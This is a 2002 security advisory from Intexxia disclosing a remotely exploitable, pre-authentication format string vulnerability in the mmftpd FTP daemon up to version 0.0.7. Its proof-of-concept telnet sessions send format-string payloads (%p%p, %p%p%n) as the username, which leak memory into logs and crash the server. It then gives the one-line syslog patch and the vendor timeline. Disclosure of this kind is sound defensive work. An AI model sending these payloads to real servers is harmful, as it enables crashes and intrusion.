[CERT-intexxia] mmftpd FTP Daemon Format String Vulnerability

[Benoît Roussel <benoit.roussel () intexxia com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________
SECURITY ADVISORY                                            INTEXXIA(c)
04 06 2002                                               ID #1053-040602
________________________________________________________________________
TITLE   : mmftpd FTP Daemon Format String Vulnerability
CREDITS : Guillaume Pelat / INTEXXIA
________________________________________________________________________


SYSTEM AFFECTED
===============

        mmftpd <= 0.0.7


________________________________________________________________________


DESCRIPTION
===========

        "mmftpd is a  secure FTP server  that runs as a normal user, and
supports  virtual  users  only. Each user may have specific permissions,
including  the  maximum  home  directory  size limit and download/upload
speeds. It runs on both  BSD and Linux systems, and is ideal for a setup
with many  Web virtual host customers. It was written from scratch, with
no borrowed code."

        The  Laboratory  intexxia  found  a  remotely exploitable format
string vulnerability in the mmftpd FTP deamon .


________________________________________________________________________


DETAILS
=======

        There  is  a  format  string  vulnerability  in the 'mmsyslog()'
function  of the  'mmftpd ' program. This function acts like 'vsyslog()'
if '__GLIBC__' is  defined.  It calls  the 'syslog(3)' function  with  a
format string that can be defined by a remote user. It is not  necessary
to authenticate to exploit this vulnerability.

Successful exploitation of this  flaw can  allow a remote user to obtain
a local account on the target machine.


________________________________________________________________________


PROOF OF CONCEPT
================

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p 
331 Password required for this user
PASS foo
530 Invalid login

In the log file :
mmftpd[1875]: 3CFC80CF Failed login for 0x80598800x80ae73c (unexisting)

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p%n
331 Password required for this user
PASS foo
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused


________________________________________________________________________


SOLUTION
========

The following patch corrects this issue :

diff -dru mmftpd-0.0.7/mmlib/mmlog.c mmftpd-0.0.7.fixed/mmlib/mmlog.c
- --- mmftpd-0.0.7/mmlib/mmlog.c Mon May 13 08:20:13 2002
+++ mmftpd-0.0.7.fixed/mmlib/mmlog.c Tue Jun  4 11:25:03 2002
@@ -70,7 +70,7 @@
  va_start(lst, fmt);
  vsnprintf(buf, 1023, fmt, lst);
  va_end(lst);
- - syslog(LOG_NOTICE, buf);
+ syslog(LOG_NOTICE, "%s", buf);
     }
 }

A new version including this patch is available at the following URL :
http://mmondor.gobot.ca/software/linux/mmftpd-0.0.8.tar.gz


________________________________________________________________________


VENDOR STATUS
=============

        04-06-2002 : This bulletin was sent to Matthew Mondor.
        05-06-2002 : Matthew   was  very   reactive  and  confirmed  the
                     vulnerability. He released a new version.


________________________________________________________________________


LEGALS
======

        mmftpd is registered trademark.


        Intexxia provides this  information  as a public service and "as
is". Intexxia  will not be  held accountable for  any damage or distress
caused by the proper or improper usage of these materials.


        (c) intexxia 2002. This  document is property  of intexxia. Feel
free to use and distribute  this material as long as  credit is given to
intexxia and the author.


________________________________________________________________________


CONTACT
=======

CERT intexxia                                          cert () intexxia com
INTEXXIA                                         http://www.intexxia.com
171, av. Georges Clemenceau                 Standard : +33 1 55 69 49 10
92024 Nanterre Cedex - France                    Fax : +33 1 55 69 78 80

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBPQdFek2N8BNyNDXLEQKEpACgt/bLhZ6ahg8ryeQZySgsAwfgrN0AoN1t
+RZxkiJQjPqx2M/035bKlMSq
=pRJF
-----END PGP SIGNATURE-----